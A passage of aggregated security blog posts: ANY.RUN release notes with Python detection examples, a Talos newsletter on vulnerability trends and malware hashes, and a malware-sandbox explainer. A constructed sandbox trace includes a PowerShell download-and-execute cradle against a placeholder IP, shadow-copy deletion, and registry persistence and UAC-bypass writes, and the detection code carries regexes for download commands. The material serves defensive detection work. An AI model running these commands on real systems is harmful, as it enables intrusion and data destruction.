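        headers, envelope = fetch(url, {"Accept": TAXII_ACCEPT})
        iocs.extend(iocs_from_envelope(envelope))
        cursor = headers.get("x-taxii-date-added-last", cursor)
        next_page = envelope.get("next")
        if not envelope.get("more") or not next_page:
            return iocs, cursor


# Constructed envelope standing in for one feed page; the hash, domain and
# URLs are documentation placeholders, not real indicators.
SAMPLE_ENVELOPE = {
    "more": False,
    "objects": [
        {"type": "indicator", "id": "indicator--1f3a2c40-0000-4000-8000-000000000001",
         "indicator_types": ["malicious-activity"], "confidence": 90,
         "valid_from": "2025-10-20T09:15:00Z",
         "pattern": "[domain-name:value = 'login-verify.example'] OR "
                    "[url:value = 'https://login-verify.example/auth']",
         "external_references": [{"source_name": "sandbox",
                                  "url": "https://sandbox.example/tasks/abc123"}]},
        {"type": "indicator", "id": "indicator--1f3a2c40-0000-4000-8000-000000000002",
         "indicator_types": ["malicious-activity"], "confidence": 85,
         "valid_from": "2025-10-20T09:20:00Z",
         "pattern": "[file:hashes.'SHA-256' = '" + "ab" * 32 + "']"},
        {"type": "indicator", "id": "indicator--1f3a2c40-0000-4000-8000-000000000003",
         "indicator_types": ["benign"], "pattern": "[ipv4-addr:value = '203.0.113.10']"},
        {"type": "malware", "id": "malware--1f3a2c40-0000-4000-8000-000000000004",
         "name": "ExampleStealer", "is_family": True},
    ],
}


def fake_fetch(url: str, headers: Dict[str, str]) -> Tuple[Dict[str, str], dict]:
    """Offline transport for the demo: every URL returns SAMPLE_ENVELOPE."""
    assert headers["Accept"] == TAXII_ACCEPT
    return {"x-taxii-date-added-last": "2025-10-20T09:20:00.000000Z"}, SAMPLE_ENVELOPE


def demo() -> Tuple[List[dict], Optional[str]]:
    """One scheduled run against the constructed feed (placeholder root/id)."""
    return poll_collection("https://taxii.example/api1", "collection-id-placeholder",
                           "2025-10-20T00:00:00.000000Z", fetch=fake_fetch)
```

Two details matter when you schedule this hourly or daily: persist the cursor returned by `poll_collection` and feed it back as `added_after`, and take that cursor from the `X-TAXII-Date-Added-Last` response header rather than from the objects’ `modified` timestamps, because `added_after` filters on the server’s `date_added`, not on object modification time.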

Threat Coverage Update 

In October, our team continued to strengthen detection capabilities so SOCs can stay ahead of new and evolving threats: 

  • 125 new behavior signatures were added to improve coverage across ransomware, loaders, stealers, and RATs, helping analysts detect persistence and payload activity earlier in the attack chain. 
  • 17 new YARA rules went live in production, expanding visibility into credential-dumping tools, network scanners, and new loader families. 
  • 3,264 new Suricata rules were deployed, enhancing detection for phishing, APT infrastructure, and evasive network behaviors. 

These updates enable analysts to gain faster, more confident verdicts in the sandbox and enrich SIEM, SOAR, and IDS workflows with fresh, actionable IOCs. 

New Behavior Signatures 

This month’s updates focus on helping analysts catch stealthy activity earlier in the attack chain. The new behavior signatures detect payload downloads, privilege escalation attempts, and persistence mechanisms used by modern ransomware, stealers, and loaders. 

We also expanded coverage of mutex detections and legitimate administrative tools often abused by attackers. Together, these improvements provide clearer visibility into real-world execution flow and strengthen automated classification in the sandbox. 
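To make concrete what behavior signatures of this kind look like in practice, here is an added example written for this page; it is not ANY.RUN’s signature engine or rule format. It runs a small set of signatures over a constructed sandbox trace (a macro document spawning PowerShell, which downloads and drops a payload that persists via a Run key, hijacks the `ms-settings` handler used by the public fodhelper UAC bypass, and deletes shadow copies), attaches the process chain and an ATT&CK technique id to each hit, scores a verdict, and pulls out the IOCs a report would carry. The trace format, signature names, severities and thresholds are this example’s own; the ATT&CK ids are the standard ones for those techniques.

```python
"""Behavior signatures over a sandbox event trace, mapped to ATT&CK ids.
Added example, not ANY.RUN's engine or rule format; the trace below is a
constructed session and the scoring thresholds are this example's own."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed trace: macro document -> PowerShell downloader -> dropped EXE
# that persists, hijacks the ms-settings handler and wipes shadow copies.
DROP = r"C:\Users\user\AppData\Roaming\svchost.exe"
TRACE = [
    {"ev": "process", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"ev": "process", "pid": 200, "ppid": 100, "image": "winword.exe", "cmdline": "winword.exe Invoice_Q3.docm"},
    {"ev": "process", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/stage.ps1')\""},
    {"ev": "network", "pid": 300, "host": "203.0.113.5", "uri": "/stage.ps1"},
    {"ev": "file_write", "pid": 300, "path": DROP},
    {"ev": "process", "pid": 400, "ppid": 300, "image": "svchost.exe", "cmdline": DROP},
    {"ev": "mutex", "pid": 400, "name": r"Global\ExampleStealer_v2"},
    {"ev": "registry", "pid": 400, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "Updater", "data": DROP},
    {"ev": "registry", "pid": 400, "key": r"HKCU\Software\Classes\ms-settings\shell\open\command",
     "name": "", "data": DROP},
    {"ev": "process", "pid": 500, "ppid": 400, "image": "fodhelper.exe", "cmdline": "fodhelper.exe"},
    {"ev": "process", "pid": 600, "ppid": 400, "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
]

INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DOWNLOAD_CMD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-urlcache|/transfer", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)


class Session:
    """Process tree plus the side tables the signatures need for context."""

    def __init__(self, trace: List[dict]):
        self.procs = {e["pid"]: e for e in trace if e["ev"] == "process"}
        self.written = {e["path"].lower() for e in trace if e["ev"] == "file_write"}

    def image(self, pid: int) -> str:
        return self.procs.get(pid, {}).get("image", "?").lower()

    def chain(self, pid: int) -> str:
        """'child <- parent <- grandparent' up to the root of the trace."""
        names, seen = [], set()
        while pid in self.procs and pid not in seen:
            seen.add(pid)
            names.append(self.image(pid))
            pid = self.procs[pid]["ppid"]
        return " <- ".join(names)

    def dropped(self, path: str) -> bool:
        """True if this session itself wrote the file being executed."""
        return path.strip('"').lower() in self.written


@dataclass
class Signature:
    name: str
    technique: str  # MITRE ATT&CK technique id
    severity: int   # 1 (informational) .. 10 (conclusive on its own)
    match: Callable[[dict, Session], bool]


SIGNATURES = [
    Signature("Office application spawns script interpreter", "T1566.001", 7,
              lambda e, s: e["ev"] == "process" and e["image"].lower() in INTERPRETERS
              and s.image(e["ppid"]) in OFFICE),
    Signature("Payload download via built-in tool", "T1105", 6,
              lambda e, s: e["ev"] == "process" and "http" in e["cmdline"].lower()
              and bool(DOWNLOAD_CMD.search(e["cmdline"]))),
    Signature("Dropped executable launched from user-writable path", "T1204.002", 5,
              lambda e, s: e["ev"] == "process" and bool(USER_WRITABLE.search(e["cmdline"]))
              and s.dropped(e["cmdline"])),
    Signature("Run key persistence", "T1547.001", 6,
              lambda e, s: e["ev"] == "registry" and e["key"].lower().endswith(r"\currentversion\run")),
    Signature("UAC bypass via ms-settings handler hijack", "T1548.002", 8,
              lambda e, s: e["ev"] == "registry"
              and r"\classes\ms-settings\shell\open\command" in e["key"].lower()),
    Signature("Shadow copy deletion", "T1490", 9,
              lambda e, s: e["ev"] == "process" and e["image"].lower() == "vssadmin.exe"
              and "delete shadows" in e["cmdline"].lower()),
]


def analyze(trace: List[dict]) -> Dict[str, object]:
    """Run every signature over every event; return hits, verdict and IOCs."""
    s = Session(trace)
    hits = [{"signature": sig.name, "technique": sig.technique, "severity": sig.severity,
             "process": s.chain(e["pid"])}
            for e in trace for sig in SIGNATURES if sig.match(e, s)]
    score = sum(h["severity"] for h in hits)
    verdict = "malicious" if score >= 15 else "suspicious" if score >= 6 else "no threats"
    iocs = {"hosts": sorted({e["host"] for e in trace if e["ev"] == "network"}),
            "mutexes": sorted({e["name"] for e in trace if e["ev"] == "mutex"}),
            "dropped_files": sorted(s.written)}
    return {"verdict": verdict, "score": score, "hits": hits, "iocs": iocs}


if __name__ == "__main__":
    report = analyze(TRACE)
    print(report["verdict"], report["score"])
    for h in report["hits"]:
        print(f'{h["technique"]:<10} {h["signature"]:<52} {h["process"]}')
    print(report["iocs"])
```

The point of carrying the process chain on every hit is the same one the release notes make about execution flow: a `vssadmin delete shadows` is far more convincing when it descends from a dropped binary under a PowerShell child of WinWord than when it appears on its own, and the chain is what an analyst reads first when validating an automated verdict.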

Highlighted families and techniques include: 

New YARA Rules 

In October, we added 17 new YARA rules focused on detecting emerging malware families, credential-dumping utilities, and reconnaissance tools increasingly used in modern attack chains. 

These additions strengthen both automated detection and manual hunting, helping analysts identify threats that blend malicious code with legitimate administrative software. 

Several new rules were built directly from live samples analyzed in the sandbox, capturing real payloads, shellcode fragments, and memory artifacts tied to loaders, stealers, and botnets. This ensures faster and more reliable classification when scanning new samples or correlating incidents across environments. 

Highlighted YARA rules include: 

  • Maverick: Detection for a recently active loader family observed in targeted phishing campaigns. 
  • ChaosBot: Identifies obfuscated botnet samples distributing info-stealers via Discord channels. 
  • Hexa: Flags packed binaries linked to a new modular backdoor variant. 
  • Pmdump: Detects credential-dumping activity using memory process extraction tools. 
  • Task Manager DeLuxe: Identifies legitimate system tools often repurposed for lateral movement. 
  • Network Scanner: Flags reconnaissance utilities used to map internal networks. 
  • Yapm: Detects process-management tools frequently abused for privilege escalation. 
  • TaskExplorer: Expands visibility into post-exploitation tool use. 
  • Ophcrack: Detection of password-recovery tools commonly found in attacker toolkits. 

New Suricata Rules 

This month, the detection team delivered 3,264 new Suricata rules to improve coverage of phishing activity, APT operations, and evasive web-based malware behavior. 

These updates expand network visibility for SOCs and MSSPs, helping analysts detect malicious traffic even when it hides behind trusted services or multi-stage redirects. 

Highlighted additions include: 

  • Tycoon 2FA Domain Chain (sid:85004273, 85004828, 85005024): New heuristic rules based on the set of web resources that Tycoon’s client-side code loads in a specific order. 
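The ordered-chain idea behind those rules is worth seeing in runnable form, so here is an added example written for this page; it is not ANY.RUN’s rule set and the resource names in it are constructed stand-ins, not Tycoon 2FA indicators. Suricata expresses such chains by having one rule set a flowbit (or xbit) and the next rule require it with `isset`; the Python below does the same bookkeeping per client over constructed proxy log lines, so the two things that make this a chain heuristic are visible: the resources must arrive in order, and within a time window.

```python
"""Ordered resource-chain heuristic over HTTP proxy log lines.
Added example, not ANY.RUN's Suricata rules. It mirrors the flowbits/xbits
set-then-isset pattern in Python; chain steps, hosts and log lines are
constructed stand-ins, not real phishing-kit indicators."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple


@dataclass
class Chain:
    name: str
    steps: List["re.Pattern"]  # one client must hit these in this order
    max_gap_s: float = 30.0    # the next step must follow within this window


KIT_CHAIN = Chain("kit-like loader chain", [
    re.compile(r"/static/loader-[0-9a-f]{8}\.js$"),  # obfuscated loader script
    re.compile(r"/api/challenge\.js$"),              # bot-check script
    re.compile(r"/assets/brand/[a-z]+\.css$"),       # impersonated brand theme
    re.compile(r"/auth/submit\.php$"),               # credential post-back
])

LOG_LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")


def parse_line(line: str) -> Optional[Tuple[datetime, str, str]]:
    """'<iso timestamp> <client> <method> <url>' -> (ts, client, url), else None."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    ts, client, _method, url = m.groups()
    return datetime.fromisoformat(ts), client, url


class ChainTracker:
    """Per-client state: index of the next expected step and time of the last hit."""

    def __init__(self, chain: Chain):
        self.chain = chain
        self.state: Dict[str, Tuple[int, datetime]] = {}

    def feed(self, ts: datetime, client: str, url: str) -> Optional[dict]:
        idx, last = self.state.get(client, (0, None))
        if last is not None and (ts - last).total_seconds() > self.chain.max_gap_s:
            idx, last = 0, None             # chain went stale: forget the progress
            self.state.pop(client, None)
        steps = self.chain.steps
        if steps[idx].search(url):
            idx += 1                        # flowbits:set for this step
            if idx == len(steps):
                self.state.pop(client, None)
                return {"client": client, "chain": self.chain.name, "at": ts.isoformat()}
            self.state[client] = (idx, ts)
        elif idx > 0 and steps[0].search(url):
            self.state[client] = (1, ts)    # loader fetched again: restart the chain
        # any other URL, including a later step seen too early, is ignored
        return None


def scan(lines: List[str], chain: Chain = KIT_CHAIN) -> List[dict]:
    """Replay log lines through one tracker; return one alert per completed chain."""
    tracker, alerts = ChainTracker(chain), []
    for line in lines:
        parsed = parse_line(line)
        if parsed and (alert := tracker.feed(*parsed)):
            alerts.append(alert)
    return alerts


# Constructed proxy log. 10.0.0.5 completes the chain in order; 10.0.0.6 only
# touches the shared challenge script and a theme; 10.0.0.7 stalls for five
# minutes mid-chain; 10.0.0.8 loads the same four resources out of order.
SAMPLE_LOG = """
2025-10-21T09:00:01 10.0.0.5 GET https://kit.example/static/loader-1a2b3c4d.js
2025-10-21T09:00:02 10.0.0.5 GET https://check.example/api/challenge.js
2025-10-21T09:00:04 10.0.0.5 GET https://kit.example/assets/brand/contoso.css
2025-10-21T09:00:09 10.0.0.5 POST https://kit.example/auth/submit.php
2025-10-21T09:00:33 10.0.0.6 GET https://check.example/api/challenge.js
2025-10-21T09:00:35 10.0.0.6 GET https://shop.example/assets/brand/contoso.css
2025-10-21T09:01:00 10.0.0.7 GET https://kit.example/static/loader-deadbeef.js
2025-10-21T09:01:01 10.0.0.7 GET https://check.example/api/challenge.js
2025-10-21T09:06:00 10.0.0.7 GET https://kit.example/assets/brand/contoso.css
2025-10-21T09:06:02 10.0.0.7 POST https://kit.example/auth/submit.php
2025-10-21T09:07:00 10.0.0.8 GET https://kit.example/static/loader-0badf00d.js
2025-10-21T09:07:01 10.0.0.8 GET https://kit.example/assets/brand/contoso.css
2025-10-21T09:07:02 10.0.0.8 GET https://check.example/api/challenge.js
2025-10-21T09:07:03 10.0.0.8 POST https://kit.example/auth/submit.php
""".strip().splitlines()

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Whether an out-of-order resource should reset the chain or merely be ignored is a tuning choice; ignoring it (as here) tolerates browsers that prefetch or retry, while resetting is stricter and trades recall for precision. Either way, a chain rule only fires on the full sequence, which is what keeps a single shared resource such as a public bot-check script from producing alerts on legitimate sites that embed it.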

About ANY.RUN 

ANY.RUN supports more than 15,000 organizations worldwide across industries such as banking, manufacturing, telecom, healthcare, and technology, helping them build faster, smarter, and more resilient cybersecurity operations. 

Our cloud-based interactive sandbox enables teams to safely analyze threats targeting Windows, Linux, and Android systems in real time. Analysts can observe every system and network action, interact with running samples, and extract IOCs in under 40 seconds; all without complex infrastructure setup. 

Combined with Threat Intelligence Lookup and Threat Intelligence Feeds, ANY.RUN helps SOCs accelerate investigations, reduce noise, and improve detection accuracy. Teams can easily integrate these capabilities into SIEM and SOAR systems to automate enrichment and streamline response. 

Ready to see it in action? 
Start your 14-day trial of ANY.RUN 

The post Release Notes: ANY.RUN & ThreatQ Integration, 3,000+ New Rules, and Expanded Detection Coverage  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Trick, treat, repeat

Welcome to this week’s edition of the Threat Source newsletter. 

This one is pretty much an updated, Halloween-themed version of my newsletter from July, including data up through Q3. 

October 14th has passed, so free support for Windows 10 has come to an end, leaving you with no more fixes unless you’re willing to pony up. While users in many countries must now pay to get Windows 10 security updates (the “trick”), private users in the European Economic Area get free security updates (the “treat”) until Oct. 14, 2026. This special reward, won after consumer rights groups pushed Microsoft to do better under EU law, means no $30 fee, no reward points, and no cloud backup needed… just a Microsoft account.  

There’s another trick: The treat is for consumers, not companies, and there are some technical prerequisites (described here). 

While Cybersecurity Awareness Month is coming to an end, you still have a chance to reach out to friends and family and encourage them to update their software (one of the Core4 Messages this year). Get them to enable the Extended Security Updates (ESU), update to Windows 11, or migrate to any other OS that will receive future patches. 

Patching is critical. In Q3, we did not run short on vulnerabilities.

Figure 1. Total number of CVEs per year.

With roughly 35,000 CVEs by the end of September, we are still tracking a pace of about 130 CVEs per day. If the almost-linear trend continues, we will land at round about 47,000 for 2025. And for legal purposes, I am not challenging anyone to break the barrier of 50,000! 

This is not just about theoretical vulnerabilities. Known Exploited Vulnerabilities (KEVs) are also on the rise. In comparison, the number of KEVs stayed nearly the same between 2023 and 2024, with 187 and 186, respectively.

Figure 2. Total number of KEVs per year.

With 183 at the end of Q3, I think it is safe to say we are going to surpass the number this year. (Spoiler: At the time of writing, there were already 210.) KEVs that affect network-related gear are up by 3% to 28%, which is not a massive increase but for sure a relevant portion. Overall, vendor diversity also continues to expand, increasing from 61 in July to 79 so far this year.

Figure 3. CVE from year added to KEV in 2025.

While the oldest CVE added to the catalog was from 2017 last time, the third quarter introduced a few new negative records from 2007, 2013, 2014, and 2016. 

While this isn’t a part of our Q3 data, CVE-2025-59287 caught my attention late Friday afternoon. I didn’t expect the WSUS service to be publicly exposed to the internet, but it found its way into the KEV, too. 

In a pumpkin shell: Keep stalking those bugs and patching your spells, because vulnerabilities won’t patch themselves. Happy Halloween!

The one big thing 

We’re introducing the Tool Talk series, where Talos shares open-source tools alongside practical insights, tips, and enhancements to help cybersecurity professionals and researchers work smarter and more effectively.  

Our first post introduces dynamic binary instrumentation (DBI) and provides a step-by-step guide to building your own DBI tool using the open-source DynamoRIO framework on Windows 11. DBI lets you analyze and modify running programs — crucial for malware analysis, security audits, reverse engineering, and performance profiling — even when you don’t have the original source code. The post covers DynamoRIO’s strengths, compares it to other frameworks, and offers practical examples, including sample code from our GitHub repository. 

Why do I care? 

If you’re interested in malware analysis, debugging, or getting a deeper look inside how binaries behave at runtime, this blog shows you how to do all that without needing source code access. DBI tools like DynamoRIO are essential for modern security research, especially for bypassing common malware defenses and anti-analysis tricks. 

So now what? 

Ready to get hands-on? Follow the blog’s step-by-step instructions to build your own DBI client, test it out, and explore the example code provided. Whether you’re looking to automate malware analysis, profile software, or just tinker with low-level instrumentation, you’ll find everything you need to kickstart your own DBI projects.

Top security headlines of the week 

Microsoft issues emergency patch for critical Windows Server bug 
This CVE is a remote code execution (RCE) flaw in WSUS, which is part of Windows Server and allows administrators to schedule, manage, and deploy patches, hotfixes, service packs, and other updates. (DarkReading) 

Shutdown sparks 85% increase in U.S. government cyberattacks 
Cyberattacks against federal employees have nearly doubled since the US government shut down on Oct. 1. Experts emphasize that the most serious cyber consequences of the shutdown won’t come in the form of immediate breaches. (DarkReading) 

Over 250 Magento stores hit overnight as hackers exploit new Adobe Commerce flaw 
E-commerce security company Sansec has warned that threat actors have begun to exploit a recently disclosed security vulnerability in Adobe Commerce and Magento Open Source platforms. (The Hacker News) 

Hacking Team successor linked to malware campaign, new “Dante” commercial spyware 
Kaspersky found that victims were infected through personalized phishing links exploiting a zero-day Chrome vulnerability, with the campaign targeting a broad range of Russian organizations for espionage. (CyberScoop) 

Can’t get enough Talos? 

Upcoming events where you can find Talos 

  • BSides Osijek (Nov. 5) Osijek, Croatia 
  • AVAR (Dec. 3 – 5) Kuala Lumpur, Malaysia

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_1_Exe.exe  
Detection Name: Win.Worm.Coinminer::1201 

SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a  
MD5: 1f7e01a3355b52cbc92c908a61abf643  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a  
Example Filename: cleanup.bat  
Detection Name: W32.D933EC4AAF-90.SBX.TG 

SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe  
MD5: bf9672ec85283fdf002d83662f0b08b7  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe 
Example Filename: f_003b84.html 
Detection Name: W32.C0AD494457-95.SBX.TG 

SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
MD5: 85bbddc502f7b10871621fd460243fbc  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
Example Filename: 85bbddc502f7b10871621fd460243fbc.exe  
Detection Name: W32.41F14D86BC-100.SBX.TG 

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974  
MD5: aac3165ece2959f39ff98334618d10d9  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe  
Detection Name: W32.Injector:Gen.21ie.1201 

Cisco Talos Blog – ​Read More

What is a Malware Sandbox? Everything SOC Analysts and CISOs Need to Know 

Each cyberattack leaves behavioral evidence. A malware sandbox provides the secure environment analysts need to study that activity and uncover hidden tactics. 

Teams using sandbox analysis report measurable gains: 

  • 90% faster detection of unknown malware 
  • Up to 3× improvement in investigation speed 
  • 60% fewer false positives in automated alerts 

Behavior-based visibility gives SOCs the upper hand against stealthy attacks. Let’s see how sandbox security works, and why it has become essential for modern threat detection. 

What’s a Malware Sandbox? 

A malware sandbox is a controlled, isolated environment designed to safely run and observe suspicious files, links, or applications. It allows analysts to see exactly how a threat behaves without risking real systems or networks. 

Instead of relying on signatures or predefined rules, a sandbox focuses on dynamic malware analysis, monitoring how code acts in motion. This approach helps detect new, unknown, or obfuscated malware that traditional antivirus tools often miss. 

ANY.RUN’s Interactive Sandbox provides a safe environment for malware analysis 

Watch the full video on how ANY.RUN’s malware sandbox works 

Inside the sandbox environment, analysts can observe file system changes, registry modifications, network requests, and command execution in real time. Every action is recorded, creating a detailed behavioral profile that reveals the malware’s purpose, persistence methods, and communication patterns. 

In short, a malware analysis sandbox turns hidden threats into visible data, giving cybersecurity teams the clarity they need to understand, detect, and stop complex attacks before they spread. 

How Does a Malware Sandbox Work? 

A malware sandbox operates by executing suspicious files, links, or processes in a virtual and fully isolated environment that imitates a real operating system. This lets analysts safely observe every action the sample performs, without exposing actual devices or networks to risk. 

Modern sandboxes can be built on virtual machines, containers, or emulation frameworks. Each architecture recreates realistic conditions, including file systems, system registries, network connections, and even user interactions, so malware behaves as it would in the wild. 

Here’s how sandbox analysis typically unfolds: 

  1. Submission: A suspicious file or URL is uploaded to the sandbox environment for testing. 
  2. Execution: The sample runs in isolation, often within multiple OS profiles or hardware simulations. 
  3. Observation: The sandbox records every change: file creation, registry edits, system calls, and outbound connections. 
  4. Reporting: Once execution completes, a detailed report summarizes the malware’s actions, persistence attempts, and communication patterns. 

This approach, known as dynamic malware analysis, focuses on behavior instead of static code. It allows analysts to detect zero-day threats, hidden payloads, and polymorphic variants that traditional antivirus tools often miss. 

Advanced malware detection sandboxes also counter evasion tactics by simulating real user activity, extending runtime to catch delayed triggers, and randomizing system identifiers to appear like genuine machines. 

By sandboxing malware, security teams gain deep behavioral visibility, understanding not just what the file is, but what it tries to do. 

Example: See Real Sandbox Analysis in Action 

To see how this process works in practice, let’s look at a real-world example. Inside the ANY.RUN sandbox, a phishing sample pretending to be a Google Careers page was analyzed.  

The sandbox reveals the entire attack chain in just 60 seconds, from the Salesforce redirect and Cloudflare CAPTCHA to the fake login page that stole credentials and sent them to its command server. 

See the live session now 

Phishing exposed inside ANY.RUN malware sandbox in 60 seconds 

All stages were captured in real time: every request, redirection, and data theft attempt. The sandbox also generated a full picture of the attack: key indicators like file hashes and domains, the techniques the malware used, its network activity, and a clear process timeline. Everything an analyst would need to investigate or build detection rules was right there in one report. 

Benefits of a Malware Sandbox 

A malware sandbox gives analysts a clear view of what really happens when a threat runs. Instead of guessing based on static scans or file signatures, teams can watch the malware in action; safely, and in real time. 

Here’s why that matters: 

  • Detect new threats early: Behavior-based detection helps catch zero-day malware before traditional tools even recognize it. 
  • See the full attack chain: From file creation to network communication, sandboxes reveal every step the malware takes. 
  • Cut down false alarms: Real behavior data separates real threats from harmless lookalikes, reducing alert fatigue. 
  • Save investigation time: Automated sandbox analysis delivers full behavioral reports in minutes, not hours. 
  • Strengthen threat intelligence: Indicators like domains, hashes, and payloads collected from sandbox runs can feed directly into your detection systems. 
  • Scale with ease: Cloud sandbox setups let teams analyze thousands of samples at once, keeping pace with large-scale attacks. 

In short, a malware sandbox helps teams move from guessing to knowing, turning hidden behavior into clear, actionable insights that speed up detection and response. 

Types of Malware Sandboxes 

Not all sandboxes work the same way. Depending on how they’re deployed and what they’re used for, organizations can choose between several types, each offering a different balance of control, scalability, and performance. 

1. On-Premise Sandboxes 

These sandboxes run inside an organization’s own infrastructure. They’re ideal for teams that handle sensitive data and need full control over their analysis environment. On-premise setups can be customized to mimic internal systems closely, from OS configurations to network settings, but they often require more maintenance and hardware resources. 

2. Cloud Sandboxes 

A cloud sandbox runs remotely, making it easier to scale and share results across distributed teams. It’s especially useful for SOCs that need to analyze large volumes of samples daily or for companies that want access without complex local setup. Cloud solutions also stay up to date automatically, ensuring faster adaptation to new threats. 

3. Open-Source Sandboxes 

These types of sandboxes allow researchers and security teams to build their own sandbox environments from scratch. They’re highly customizable and great for experimentation or research, though they usually require more technical know-how to maintain. 

Each of these types of malware sandboxes serves a different need; from enterprise-grade automation to hands-on analysis. Choosing the right one depends on how much control, customization, and scale your security operations require. 

Feature  On-Premise  Cloud  Open-Source 
Easy setup & deployment  ❌  ✅  ⚙ Manual 
Automatic updates  ❌  ✅  ❌ 
Scalable for multiple analyses  ⚙ Limited  ✅  ⚙ Limited 
Customizable environment  ✅  ⚙ Partial  ✅ 
Real-time collaboration  ❌  ✅  ❌ 
No maintenance required  ❌  ✅  ❌ 
Integration with other tools (SIEM, SOAR, etc.)  ⚙ Possible  ✅  ⚙ Manual 
Cost efficiency  ⚙ Medium  ✅  ✅ (Free) 
Data privacy & local control  ✅  ⚙ Depends on provider  ✅ 
Ideal for large SOCs & MSSPs  ⚙ Sometimes  ✅  ❌ 

✅ — Yes  ⚙ — Partial / depends on setup  ❌ — No 

Who Needs a Malware Sandbox and How They Use It 

A malware sandbox is a daily necessity across different areas of cybersecurity. From SOC teams to threat intelligence analysts, everyone benefits from being able to see how malware behaves in a safe environment. 

Sandboxing is used universally across SOC teams 

Here’s how different professionals rely on sandbox analysis: 

  • SOC teams: Use sandboxes to validate alerts and speed up triage. Instead of guessing whether a file is dangerous, they can watch its behavior in real time and prioritize responses accordingly. 
  • Incident responders: Reconstruct full attack chains after an intrusion. Sandbox reports reveal what files were dropped, which connections were made, and how the infection spread; key data for containment. 
  • Threat intelligence analysts: Extract indicators of compromise (IOCs), domains, and behavioral patterns to feed detection rules and threat databases. 
  • Researchers and malware analysts: Study new malware families in depth without risking production systems, documenting how they evolve or communicate with C2 servers. 
  • Managed security providers (MSSPs): Integrate sandbox results into client reports or monitoring workflows, adding measurable value to their detection and response services. 

Sandbox vs Antivirus: Why Sandboxing Wins Against Unknown Threats 

Antivirus software protects against threats that are already known. It scans files, compares them to a database of malware signatures, and blocks anything that matches. This method works well for common, well-documented attacks, but it struggles with new or changing ones. 

Modern malware often hides its code, changes its structure, or uses encryption to stay invisible to signature-based tools. That’s where a malware sandbox makes all the difference. 

Instead of checking what a file looks like, a sandbox watches what it does. It runs the file in a safe, isolated environment and tracks every move; the processes it starts, the files it creates, and the connections it tries to make. This approach, called behavior-based detection, exposes even the newest or most complex threats. 

Simply put, antivirus tools stop what’s already known. A malware sandbox uncovers what’s new and unknown. 

Used together, they give teams both quick protection and deeper visibility; a strong mix for modern cyber defense. 

How Attackers Try to Evade Sandboxes and Why They Still Get Caught 

As malware sandboxes become more advanced, attackers are learning to adapt. Some modern malware doesn’t simply run its code right away; it first checks where it’s running. If it senses it’s inside a sandbox, it may stay quiet, hoping to slip through undetected. 

These are some of the most common tricks attackers use: 

  • Delaying execution: The malware waits several minutes or hours before acting, trying to outlast the sandbox’s observation time. 
  • Looking for virtual clues: It searches for signs that it’s inside a virtual machine, like specific file names, processes, or limited memory, and stops running if it finds them. 
  • Waiting for human activity: Some samples won’t execute until they detect mouse movement or clicks, assuming automated systems won’t simulate them. 
  • Checking network connections: Malware might reach out to its command-and-control server and only activate if it receives a valid response. 

ANY.RUN’s sandbox revealing the malicious link hidden inside a QR code that most traditional detection tools would miss 

To keep up, modern malware analysis sandboxes have grown much smarter. They simulate human actions like typing and clicking, randomize virtual hardware details, and even extend analysis time to catch delayed behavior. Some advanced platforms also run the same sample across multiple environments to expose hidden logic or secondary payloads. 

So yes, attackers keep trying to fool sandboxes. But as sandbox technology evolves, those tricks are becoming less effective. Each new generation of sandbox security makes it harder for malware to hide, ensuring analysts still see the full picture before damage is done. 

How to Choose the Right Malware Sandbox 

With so many sandbox solutions available, choosing the right one can be tricky. Some focus on quick verdicts, others on deep behavioral insights. The best choice depends on your goals; whether you’re running a SOC, enriching threat intelligence, or conducting malware research. 

When evaluating options, start with what matters most: visibility. A good sandbox doesn’t just tell you that a file is malicious, it shows why. It should capture every action the sample performs: file system changes, registry edits, process trees, and network traffic. These behavioral details are what make sandbox analysis so powerful. 

Realism is equally important. The closer the sandbox mimics a real system, the more accurate the results. Platforms that support multiple operating systems and simulate user activity (like mouse clicks or typing) are better at exposing evasive malware that would otherwise stay hidden. 

